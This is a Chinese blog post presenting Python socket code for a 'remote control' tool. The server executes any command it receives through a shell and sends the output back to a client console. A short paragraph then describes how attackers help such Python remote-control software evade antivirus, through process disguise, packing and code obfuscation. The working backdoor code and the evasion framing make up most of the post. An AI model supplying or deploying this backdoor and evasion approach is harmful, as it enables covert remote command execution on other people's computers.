python构造远控

server端:

import socket
import subprocess
server=socket.socket()
server.bind(('127.0.0.1',4444))
server.listen(5)
while True:
    conn,addr=server.accept()
    print("new conn:",addr)

    while True:
        print(addr)
        data=conn.recv(1024)
        print(len(data))
        print(data.decode())
        cmd_rese=subprocess.Popen(data.decode(),shell=True,stdout=subprocess.PIPE)
        outread=cmd_rese.stdout.read()
        print(len(outread))
        conn.send(("%s" % len(outread)).encode("utf-8"))
        print(outread.decode("gb2312"))
        conn.send(outread)

  kehu端:

import socket

client=socket.socket()
client.connect(("127.0.0.1",4444))

while True:
    cmd=input(">>:").strip()
    if len(cmd)==0:continue
    print(cmd)
    client.send(cmd.encode("utf-8"))
    print("res")
    res_size=client.recv(1024).decode("utf-8")
    size=0
    while size<int(res_size):
        res=client.recv(1024)
        print(res.decode("gb18030"))
        size+=len(res)

  运行图:

 

 

转载于:https://www.cnblogs.com/haq5201314/p/8422322.html

Python 免杀是一种利用 Python 编写的制软件,它可以在绝大部分主流操作系统上运行,并且在被安装之后可以制对方计算机。 由于 Python 是一种流行的编程语言,因此很多黑客和攻击者都利用 Python 编写制软件。然而,许多防病毒软件和安全性软件都会在扫描文件时检测到并阻止这些攻击软件的运行。 为了免遭检测,攻击者会采用各种方法来隐藏软件,从而实现免杀。其中常见的方法包括: 1. 僵尸进程:攻击者会将软件做成一个僵尸进程,使其看起来像一个正常的系统进程。这样做可以让防病毒软件误认为这是一个合法的系统进程,从而放过该进程。 2. 免杀加壳:攻击者会将 Python 的源代码打包加密成特定格式的二进制文件,并加上壳。这样可以隐藏代码,并且使病毒扫描器无法解析其中的文件内容。 3. 代码混淆:攻击者会利用 Python 本身的特性,混淆代码使其变得难以理解和检测。例如,他们可以使用函数名、变量名等随机的字符串来替换原有的代码名称,或者将代码分成多个模块并交叉引用。 总之,为了免杀,攻击者会采用各种方法来隐藏软件,使其看起来像一个正常的系统进程。因此,用户和安全人员需要持续关注安全漏洞,并采取适当的安全措施来保护自己的计算机和数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值